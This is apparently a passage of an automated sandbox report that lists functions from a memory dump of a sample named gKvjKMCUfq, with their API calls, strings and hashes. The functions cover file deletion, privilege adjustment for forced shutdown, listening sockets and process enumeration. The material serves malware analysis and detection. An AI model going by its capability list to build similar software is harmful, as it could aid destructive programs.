Function 007D37EF Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00774750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00774743,?,?,007737AE,?), ref: 00774770

Part of subcall function 007D4A31: GetFileAttributesW.KERNEL32(?,007D370B), ref: 007D4A32

FindFirstFileW.KERNEL32(?,?), ref: 007D38A3
DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 007D394B
MoveFileW.KERNEL32(?,?), ref: 007D395E
DeleteFileW.KERNEL32(?,?,?,?,?), ref: 007D397B
FindNextFileW.KERNEL32(00000000,00000010), ref: 007D399D
FindClose.KERNEL32(00000000,?,?,?,?), ref: 007D39B9

Strings

\*.*, xrefs: 007D384E, 007D3857, 007D386C

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 4002782344-1173974218
Opcode ID: adcd179e2c9b2d6bf7cf855c7a94895f84b91962d6c79a1d9a5ab3c20cc2e84e
Instruction ID: 0966ae52eb0e30d80791a639b53b11054c5cc0a45ec45a02c71431c209e5ffbc
Opcode Fuzzy Hash: adcd179e2c9b2d6bf7cf855c7a94895f84b91962d6c79a1d9a5ab3c20cc2e84e
Instruction Fuzzy Hash: 2D51A23180514DEACF05EBA0C9969FDB778AF15344F60806AE40AB7291EF796F0DCB61

Function 007DF3F3 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00777DE1: _memmove.LIBCMT ref: 00777E22

FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 007DF440
Sleep.KERNEL32(0000000A), ref: 007DF470
_wcscmp.LIBCMT ref: 007DF484
_wcscmp.LIBCMT ref: 007DF49F
FindNextFileW.KERNEL32(?,?), ref: 007DF53D
FindClose.KERNEL32(00000000), ref: 007DF553

Strings

*.*, xrefs: 007DF425

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
String ID: *.*
API String ID: 713712311-438819550
Opcode ID: 7bb8946752dc6f99f3c7a5cc976c1a79fc5ce63ed7e05ae91f88ca93d42d74b2
Instruction ID: 565d896314ed7063ec4a0bc0bd190c338bb9a871d924c7ae1a55c9e0daedc5a6
Opcode Fuzzy Hash: 7bb8946752dc6f99f3c7a5cc976c1a79fc5ce63ed7e05ae91f88ca93d42d74b2
Instruction Fuzzy Hash: 80415E7190025ADFCF14DF64DC49AEEBBB4FF05310F148466E81AA2291DB389A94CF50

Function 00783030 Relevance: 11.1, APIs: 4, Strings: 2, Instructions: 587COMMON

Download Yara Rule

Strings

_x, xrefs: 00783322
3cx, xrefs: 00783225

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: __itow__swprintf
String ID: 3cx$_x
API String ID: 674341424-2911194521
Opcode ID: 114ef1cdc1a9424c08d94964fd06f4655bdb4d789d5e74e3865f053e633efe23
Instruction ID: 0183a543d2b433bbf0050ce97feb850c25bec2f5410f90a0985babe6f354f6dc
Opcode Fuzzy Hash: 114ef1cdc1a9424c08d94964fd06f4655bdb4d789d5e74e3865f053e633efe23
Instruction Fuzzy Hash: 3222A071608340DFDB24EF18C885BAEB7E5BF84B10F10492DF59A97291DB79E904CB92

Function 00785760 Relevance: 11.0, APIs: 7, Instructions: 532COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 007858A5
_memmove.LIBCMT ref: 007858F5
_memmove.LIBCMT ref: 0078595B

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 12c8282c6f2da3f7d3f5a3dac192a010437fd7a7d7687dc62c484fae3d86467f
Instruction ID: b6dc4daafa62c883334ee461538b640c05d0604cc1ca78ca8dd62468d775cde6
Opcode Fuzzy Hash: 12c8282c6f2da3f7d3f5a3dac192a010437fd7a7d7687dc62c484fae3d86467f
Instruction Fuzzy Hash: 04128A70A00609DFDF14EFA5D985AAEB7F5FF48310F108529E44AE7250EB39AD21CB91

Function 007D3B12 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00774750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00774743,?,?,007737AE,?), ref: 00774770

Part of subcall function 007D4A31: GetFileAttributesW.KERNEL32(?,007D370B), ref: 007D4A32

FindFirstFileW.KERNEL32(?,?), ref: 007D3B89
DeleteFileW.KERNEL32(?,?,?,?), ref: 007D3BD9
FindNextFileW.KERNEL32(00000000,00000010), ref: 007D3BEA
FindClose.KERNEL32(00000000), ref: 007D3C01
FindClose.KERNEL32(00000000), ref: 007D3C0A

Strings

\*.*, xrefs: 007D3B5B

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: e87e0aa58e860f480efb8d12b0ff938d7231956163af08977e3c748435b67ac0
Instruction ID: b7fb4afc3a94c9204528778af365e23f974ca067e7e8a8c3c499ac2965965f28
Opcode Fuzzy Hash: e87e0aa58e860f480efb8d12b0ff938d7231956163af08977e3c748435b67ac0
Instruction Fuzzy Hash: 5F31A431008385DBC705EF64C8998AFB7B8BE95314F408D2EF4D992291EB28DA08C767

Function 007D51BD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 007C87E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 007C882B
Part of subcall function 007C87E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 007C8858
Part of subcall function 007C87E1: GetLastError.KERNEL32 ref: 007C8865

ExitWindowsEx.USER32(?,00000000), ref: 007D51F9

Strings

SeShutdownPrivilege, xrefs: 007D51C9
@, xrefs: 007D51EC
, xrefs: 007D51E7

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $@$SeShutdownPrivilege
API String ID: 2234035333-194228
Opcode ID: cec1815e35e4de408385ba3217cae71218a34343b59a8e8ec0da87463e4d5bba
Instruction ID: b000cc32717ab616c4c2b52b7301abf49e1a463cd8daa55e8aabbc40455fb4e7
Opcode Fuzzy Hash: cec1815e35e4de408385ba3217cae71218a34343b59a8e8ec0da87463e4d5bba
Instruction Fuzzy Hash: D801F7B1791615ABF7286268AC8BFBB7378FB04340F24042BF913E22D2DD5D3C048594

Function 007E6283 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 007E62DC
WSAGetLastError.WSOCK32(00000000), ref: 007E62EB
bind.WSOCK32(00000000,?,00000010), ref: 007E6307
listen.WSOCK32(00000000,00000005), ref: 007E6316
WSAGetLastError.WSOCK32(00000000), ref: 007E6330
closesocket.WSOCK32(00000000,00000000), ref: 007E6344

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: 0c31669aff459ca4aabfe96efe6c661ee62976e32f6b2a18c5979c00c01243fd
Instruction ID: 302ab7d317571c48f008f28a1c90f7a24e3a37ce191507535c14c4e03014aaeb
Opcode Fuzzy Hash: 0c31669aff459ca4aabfe96efe6c661ee62976e32f6b2a18c5979c00c01243fd
Instruction Fuzzy Hash: 8A219E716012049FCB10EF64DC89B7EB7E9EF49760F148159E926A7391CB78AD01CB51

Function 00785520 Relevance: 8.0, APIs: 5, Instructions: 516COMMON

Download Yara Rule

APIs

Part of subcall function 00790DB6: std::exception::exception.LIBCMT ref: 00790DEC
Part of subcall function 00790DB6: __CxxThrowException@8.LIBCMT ref: 00790E01

_memmove.LIBCMT ref: 007C0258
_memmove.LIBCMT ref: 007C036D
_memmove.LIBCMT ref: 007C0414

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: _memmove$Exception@8Throwstd::exception::exception
String ID:
API String ID: 1300846289-0
Opcode ID: df34f6af629a118341c69c63906c15d6da0777146d2e604ca1659fde71bbbf48
Instruction ID: ded15265678778bf4354f95f27072986db6e4127980eefe37af54f4fa044aaa0
Opcode Fuzzy Hash: df34f6af629a118341c69c63906c15d6da0777146d2e604ca1659fde71bbbf48
Instruction Fuzzy Hash: 3D028EB0A00209DFCF04EF64D985AAEBBB5FF44310F54806DE80ADB255EB39DA55CB91

Function 00771287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON

Download Yara Rule

APIs

Part of subcall function 00772612: GetWindowLongW.USER32(?,000000EB), ref: 00772623

DefDlgProcW.USER32(?,?,?,?,?), ref: 007719FA
GetSysColor.USER32(0000000F), ref: 00771A4E
SetBkColor.GDI32(?,00000000), ref: 00771A61

Part of subcall function 00771290: DefDlgProcW.USER32(?,00000020,?), ref: 007712D8

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: ColorProc$LongWindow
String ID:
API String ID: 3744519093-0
Opcode ID: 80ee62c8752979ad9c4d4a3822eea43ff1c0938f1392bcabdc95518b3a71c6ef
Instruction ID: 2a21beb0ca55b1cc304e7620cc7b8151d9fb860f105c5572804d84871da0e95e
Opcode Fuzzy Hash: 80ee62c8752979ad9c4d4a3822eea43ff1c0938f1392bcabdc95518b3a71c6ef
Instruction Fuzzy Hash: FEA13B71106588FADE28AB3C8C48D7F265DEF823C1B95C619F60AD6193DA2CED01D7B1

Function 007DBCBC Relevance: 7.6, APIs: 5, Instructions: 143fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 007DBCE6
_wcscmp.LIBCMT ref: 007DBD16
_wcscmp.LIBCMT ref: 007DBD2B
FindNextFileW.KERNEL32(00000000,?), ref: 007DBD3C
FindClose.KERNEL32(00000000,00000001,00000000), ref: 007DBD6C

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNext
String ID:
API String ID: 2387731787-0
Opcode ID: ace2f1e7a5cc13442cb115d979b7cb08feef99dfd67980f7595dce24d56b7149
Instruction ID: 96c1159cd340b1a060085e7ba1d9b7fe8d5d29d2ce198dacfa90b2902434d11b
Opcode Fuzzy Hash: ace2f1e7a5cc13442cb115d979b7cb08feef99dfd67980f7595dce24d56b7149
Instruction Fuzzy Hash: 84518835604602DFCB18DF28D494EAAB3F5EF49320F11865EE95A873A1DB38ED04CB91

Function 007E6747 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON

Download Yara Rule

APIs

Part of subcall function 007E7D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 007E7DB6

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 007E679E
WSAGetLastError.WSOCK32(00000000), ref: 007E67C7
bind.WSOCK32(00000000,?,00000010), ref: 007E6800
WSAGetLastError.WSOCK32(00000000), ref: 007E680D
closesocket.WSOCK32(00000000,00000000), ref: 007E6821

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: ErrorLast$bindclosesocketinet_addrsocket
String ID:
API String ID: 99427753-0
Opcode ID: 8a5dd30803ceb405901be345e92434887da1029b9e4b76f6a47342aacad6e879
Instruction ID: 47a112468b3bd2bf6381d90df28a8f8e02947f739733952d5718e5a4bbf5994e
Opcode Fuzzy Hash: 8a5dd30803ceb405901be345e92434887da1029b9e4b76f6a47342aacad6e879
Instruction Fuzzy Hash: A9419175B40210AFDF50AF248C8AF7E77E89F09794F04C458FA19AB3D2DA789D008792

Function 007F5376 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 007F53C5
IsWindowEnabled.USER32 ref: 007F53D3
GetForegroundWindow.USER32(?,?,00000001), ref: 007F53E0
IsIconic.USER32 ref: 007F53EE
IsZoomed.USER32 ref: 007F53FC

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: fdd716a638ff44b273841720a5f1fda5b64b3788bbf90de233aa5be505a1eeee
Instruction ID: 0ce91cb9c1564a5b179464a8c2279ce7425f0bc7f1052f233cae9e198e0ed7cb
Opcode Fuzzy Hash: fdd716a638ff44b273841720a5f1fda5b64b3788bbf90de233aa5be505a1eeee
Instruction Fuzzy Hash: E511B231300A19AFDB216F2ADC88B7EBB99EF457A5B508029FA45D3341CF789C01C6A5

Function 007C80A9 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 007C80C0
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 007C80CA
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 007C80D9
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 007C80E0
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 007C80F6

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 21a337cf1c4f30ac37b788f1598c981dae17a366169b600bf23cd5637a72ef12
Instruction ID: 6525c2eb6b5248c780a579eb759a9fa6500cf01618108e30373ded09378fe284
Opcode Fuzzy Hash: 21a337cf1c4f30ac37b788f1598c981dae17a366169b600bf23cd5637a72ef12
Instruction Fuzzy Hash: DCF03731240208AFEB101FA5EC89E7B3BACEF89755B14402DF949C6250CF699C42DA65

Function 00774B37 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00774AD0), ref: 00774B45
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00774B57

Strings

GetNativeSystemInfo, xrefs: 00774B51
kernel32.dll, xrefs: 00774B40

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: 4575a30917675a6be534d26a65f6c719e3c8b1a47339376623eccc6632cc861c
Instruction ID: 56b233a92ae12332fcf90e93757f43945e0c72f0efb500c7e04e0a0eb951ea17
Opcode Fuzzy Hash: 4575a30917675a6be534d26a65f6c719e3c8b1a47339376623eccc6632cc861c
Instruction Fuzzy Hash: C9D012B4A1071BDFDB209F31D858B1676E5AF05395B11C839D485D6260DB78D880C659

Function 007EEE0D Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 007EEE3D
Process32FirstW.KERNEL32(00000000,?), ref: 007EEE4B

Part of subcall function 00777DE1: _memmove.LIBCMT ref: 00777E22

Process32NextW.KERNEL32(00000000,?), ref: 007EEF0B
CloseHandle.KERNEL32(00000000,?,?,?), ref: 007EEF1A

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
String ID:
API String ID: 2576544623-0
Opcode ID: 42addb853e0d8ef573298e7c0596635683aa288dd0213a43c0c8358d1fede334
Instruction ID: 9438a2088cad2976d39f01af5a5f1c60123d50cd8df6902a084f84954a8575d7
Opcode Fuzzy Hash: 42addb853e0d8ef573298e7c0596635683aa288dd0213a43c0c8358d1fede334
Instruction Fuzzy Hash: C5519071505301EFD710EF20DC89E6BB7E8EF88750F10882DF599972A1EB74A904CB92

Function 007CE616 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 007CE628

Strings

(, xrefs: 007CE66E
|, xrefs: 007CE658

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: lstrlen
String ID: ($|
API String ID: 1659193697-1631851259
Opcode ID: 4e542efd44914975773cd0938fbb663d053a85d36b588e3675198cce6df6dcc2
Instruction ID: 188b0e6c90b0dec1be6791fe76d07de799862581fee848857a571c4a6afb85a5
Opcode Fuzzy Hash: 4e542efd44914975773cd0938fbb663d053a85d36b588e3675198cce6df6dcc2
Instruction Fuzzy Hash: 26321275A006059FDB28CF19C481E6AB7F1FF48320B15C46EE89ADB3A1E774E941CB40

Function 007E22EE Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,007E180A,00000000), ref: 007E23E1
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 007E2418

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: 894da0456767ed0026125d5b1c23cde0d3608160d6f12059f65000d72daa544a
Instruction ID: 36e13ae57a235ab0c64e8c08a18199f415ee72bc8a6b563615b3ad2e5e311946
Opcode Fuzzy Hash: 894da0456767ed0026125d5b1c23cde0d3608160d6f12059f65000d72daa544a
Instruction Fuzzy Hash: D641F871505289FFEF10DE96DC85EBBB7BCEB49314F10402AF601A6182DA7C9E429A60

Function 007DB333 Relevance: 4.6, APIs: 3, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 007DB343
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 007DB39D
SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 007DB3EA

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

